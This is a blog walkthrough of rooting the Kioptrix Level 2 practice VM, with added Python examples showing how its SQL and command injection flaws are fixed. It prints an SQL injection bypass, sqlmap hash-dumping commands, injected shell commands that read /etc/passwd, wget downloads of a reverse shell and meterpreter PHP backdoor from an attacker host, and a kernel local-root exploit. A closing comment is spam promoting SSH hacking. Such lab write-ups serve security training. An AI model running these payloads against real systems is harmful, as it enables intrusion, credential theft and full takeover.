Sunday, 19 August 2012

Kioptrix Level 2

Hi everyone, in this post I will explain how to get root on Kioptrix LEVEL 2.
Let's start with the basics: nmap!


Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-13 10:30 BST
Nmap scan report for 172.16.1.189
Host is up (0.021s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE              VERSION
22/tcp   open  ssh                  OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http                 Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind (rpcbind V2) 2 (rpc #100000)
443/tcp  open  ssl/http             Apache httpd 2.0.52 ((CentOS))
631/tcp  open  ipp                  CUPS 1.1
3306/tcp open  mysql                MySQL (unauthorized)
MAC Address: 00:50:56:AF:62:3F (VMware)
OK, so for this one, let's try to access Apache on that IP address. Open your browser and type the IP address of your Kioptrix; in my case it is http://172.16.1.189. As you can see there is a login web page. We don't know the user/password, but we can guess, or try a SQL injection. In my case I am doing the SQL injection, so in the username field type: admin, and in the password field
type: ' OR 1=1 -- -
If you want to dig a bit more into the SQL injection side of things, we can use sqlmap to fetch some information from the database. Here are some examples:
1) Available databases :
./sqlmap.py -u "http://172.16.1.189" --data "uname=admin&psw=xx' or OR 1=1 -- -" --dbs
Result:
available databases [2]:
[*] `test\_%`
[*] test
2) Identify the current database
./sqlmap.py -u "http://172.16.1.189" --data "uname=admin&psw=xx' or OR 1=1 -- -" --current-db
Result :
current database:    'webapp'
3) Find all mysql users passwords
./sqlmap.py -u "http://172.16.1.189" --data "uname=admin&psw=xx' or OR 1=1 -- -" --passwords
Result :
[*] john [1]:
    password hash: 5a6914ba69e02807
[*] root [1]:
    password hash: 5a6914ba69e02807
And so on. You can also get a SQL shell on the server if you want.
./sqlmap.py -u "http://172.16.1.189" --data "uname=admin&psw=xx' or OR 1=1 -- -" --sql-shell
>select * from users; [2]:
[*] 1, 5afac8d85f, admin
[*] 2, 66lajGGbla, john
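To see why the login form above falls to ' OR 1=1 -- - and why the sqlmap queries work at all, here is an added example (not code from the original post or from the Kioptrix VM) that rebuilds the login check in Python against an in-memory SQLite table. The table contents are the two rows shown in the sql-shell output above; the column layout (id, password, username), the function names and the use of SQLite instead of MySQL are my assumptions. The vulnerable function concatenates the user input into the query the way the Kioptrix page does; the safe one uses placeholders so the same input is just a string.

```python
import sqlite3

# Constructed sample table: the two rows the sql-shell output above returned.
SAMPLE_USERS = [(1, "5afac8d85f", "admin"), (2, "66lajGGbla", "john")]


def _connect():
    """Build a throwaway in-memory users table (assumed layout: id, password, username)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, password TEXT, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


DB = _connect()


def login_vulnerable(uname, psw, conn=DB):
    """The bug: input is pasted into the statement text, so a quote in the
    password closes the literal and the rest becomes SQL.  With the page's
    payload the WHERE clause becomes  password = '' OR 1=1 -- -'  and every
    row matches."""
    query = (
        "SELECT id, username FROM users WHERE username = '%s' AND password = '%s' "
        "ORDER BY id" % (uname, psw)
    )
    return conn.execute(query).fetchall()


def login_safe(uname, psw, conn=DB):
    """The fix: placeholders.  The driver sends the values separately from the
    statement, so quotes and comment markers never change the query structure."""
    return conn.execute(
        "SELECT id, username FROM users WHERE username = ? AND password = ? ORDER BY id",
        (uname, psw),
    ).fetchall()


if __name__ == "__main__":
    payload = "' OR 1=1 -- -"
    print("vulnerable:", login_vulnerable("admin", payload))
    print("safe:      ", login_safe("admin", payload))
    print("safe, real password:", login_safe("admin", "5afac8d85f"))
```

The vulnerable version returns both rows for the bypass payload, which is exactly the behaviour that lets the Kioptrix form log you in without a password; the parameterised version returns nothing for it and still returns the admin row for the real password. The same reasoning applies to the `--passwords` and `--sql-shell` results: sqlmap only gets that far because the injected text reaches the SQL parser unescaped.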

Now, coming back to the browser, you can see a new web page saying that you can ping a machine on the network. That means the page executes a command, and if it is not properly configured, we can run more than just "ping". Let's try ping first, then we can try something else. If you typed your IP address in that box, you will be forwarded to http://172.16.1.189/pingit.php. That's the one we need to look at now. So, instead of just a ping, let's try to add something else to the command, like "; cat /etc/passwd", and see what happens. As you can see, we can read /etc/passwd, which means we have a web shell on
the server and now we can execute anything (almost ;) ), so let's upload our backdoor to the server.
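The pingit.php bug is the classic shape of OS command injection: the submitted address is glued onto a shell command line, so "; cat /etc/passwd" is parsed by the shell as a second command. As an added example (not code from the original post or from the Kioptrix VM), this Python handler shows the vulnerable construction beside a hardened one: the target is first checked to be a bare IP address with the standard ipaddress module, and ping is then launched with an argument list and no shell, so metacharacters can never be interpreted. The function names, the `-c 1` ping options and the use of Python rather than PHP are my assumptions.

```python
import ipaddress
import subprocess


def vulnerable_command(raw):
    """The bug, shown as the string a shell=True call would hand to /bin/sh.
    Only built here for contrast; it is never executed in this example."""
    return "ping -c 1 " + raw


def validate_target(raw):
    """Return the canonical text of an IPv4/IPv6 address, or None if the input
    is anything other than a single address (spaces, ';', hostnames, ...)."""
    try:
        return str(ipaddress.ip_address(raw.strip()))
    except ValueError:
        return None


def build_ping_argv(raw):
    """Argument vector for ping, or None when the target was rejected.
    Each list element becomes exactly one argv entry via execve; no shell
    ever sees the user's text, so ';', '|' and '`' carry no meaning."""
    ip = validate_target(raw)
    if ip is None:
        return None
    return ["ping", "-c", "1", ip]


def run_ping(raw, timeout=10):
    """Run the hardened ping and return its combined output, or a rejection
    message.  shell=False is the default for list arguments and is the point."""
    argv = build_ping_argv(raw)
    if argv is None:
        return "rejected: target must be a single IP address"
    try:
        result = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    except (FileNotFoundError, subprocess.TimeoutExpired) as exc:
        return "ping failed: %s" % exc
    return result.stdout + result.stderr


if __name__ == "__main__":
    # Constructed inputs: the legitimate one and the injection tried on the page.
    for candidate in ("172.16.1.1", "172.16.1.1 ; cat /etc/passwd"):
        print(repr(candidate))
        print("  shell string would be:", repr(vulnerable_command(candidate)))
        print("  hardened argv:        ", build_ping_argv(candidate))
```

Validation plus an argument list covers the page's payload and the rest of the family (pipes, backticks, "$(...)"), because rejection happens before any shell is involved and the surviving input is a single argv entry. Allowing hostnames would need a stricter allow-list pattern than ip_address provides; the lesson is the same, never let the raw field reach sh.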
We can do this in many ways; I will be explaining two methods.
1) Upload a reverse shell (the easiest way)
172.16.1.1 ; wget -O /tmp/reverse_shell http://172.16.1.79/exploits/reverse_shell2
2) Change its permissions so it can be executed.
172.16.1.1 ; chmod 777 /tmp/reverse_shell
3) Prepare your BT server for the connection
nc -l -p 10000
4) And now run the reverse_shell
172.16.1.1 ; /tmp/reverse_shell
Done, now we have a shell. Let's try the same using BackTrack.
1) We need to start Apache: /etc/init.d/apache2 start
2) We need to create our backdoor:
LHOST: IP of your BackTrack
LPORT: port that BackTrack will be listening on
/var/www/backdoor.php.txt: where the backdoor will be saved.
So the complete command is:
msfpayload php/meterpreter/reverse_tcp LHOST=172.16.1.79 LPORT=8080 R > /var/www/backdoor.php.txt

Now, we need to start our session handler.

msfconsole
use multi/handler
search php
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 8080
exploit -j -z
Leave this one running and open another shell on your BackTrack.
We need to edit our backdoor.php.txt (script kid stuff):
vi /var/www/backdoor.php.txt. Remove the "#" from the first line and save it.

Next step is to insert this in our ping command line:
172.16.1.1 ; cd /tmp ; wget -O backdoor.php 172.16.1.79/backdoor.php.txt ; php -f backdoor.php
If you look at the other shell, you should be seeing this by now:
[*] Sending stage (39217 bytes) to 172.16.1.189
[*] Meterpreter session 4 opened (172.16.1.79:8080 -> 172.16.1.189:32807) at 2012-08-13 14:12:00 +0100
meterpreter >
Great, now that we have access to the box, we need to get root.
uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux

Now we need to find an exploit for that kernel. If you Google it, you will end up on SecurityFocus or a similar site. You can download the exploit from SecurityFocus or from Exploit-DB, or use the one that is inside BackTrack.
http://www.exploit-db.com/exploits/9542/
http://www.securityfocus.com/bid/36108/info

Or ... you can search inside BackTrack.
/pentest/exploits/exploitdb/searchsploit kernel linux local
And that's the one you are looking for:
Linux Kernel 2.x sock_sendpage() Local Ring0 Root Exploit           /linux/local/9435.txt
Again, you can try other exploits as well. Now that you have the exploit, compile it and run it on the target machine.
wget http://172.16.1.79/exploits/ip_append_data.c
gcc -o get_root ip_append_data.c
./get_root
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)

And that's it, game over.

5 comments:

  1. What is the default login password of Kioptrix 1?

  2. None, that's part of the challenge :)

  3. This comment has been removed by a blog administrator.

  4. how to hack ssh root

    http://bicombusiness.blogspot.com/2016/01/sshpro13-final.html
